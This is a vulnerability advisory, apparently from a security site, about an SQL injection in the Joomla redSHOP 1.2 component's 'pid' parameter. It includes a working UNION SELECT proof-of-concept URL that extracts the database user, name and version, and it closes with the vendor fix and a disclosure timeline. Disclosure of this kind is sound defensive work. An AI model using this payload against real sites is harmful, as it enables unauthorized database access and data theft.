Joomla redSHOP 1.2 SQL Injection

2013.08.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

-------------------------------------------- Joomla! redSHOP component v1.2 SQL Injection -------------------------------------------- == Description == - Product: Joomla! redSHOP component - Product link: http://redcomponent.com/redcomponent/redshop - Vendor: redcomponent - Affected versions: version 1.2 is vulnerable. Other versions might be affected as well. - Vulnerability discovered by: Matias Fontanini == Vulnerability == When using the "addtocompare" task, the component does not correctly sanitize the "pid" parameter before using it to construct SQL queries, making it vulnerable to SQL Injection attacks. The following proof of concept request retrieves the database user, name and version: http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422 == Solution == Upgrade the product to the 1.3 version. == Report timeline == [2013-08-02] Vulnerability reported to vendor. [2013-08-02] Developers answered back indicating that an update would be released soon. [2013-08-06] redSHOP 1.3 was released, which fixes the reported issue. [2013-08-08] Public disclosure.

References:

http://redcomponent.com/redcomponent/redshop


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top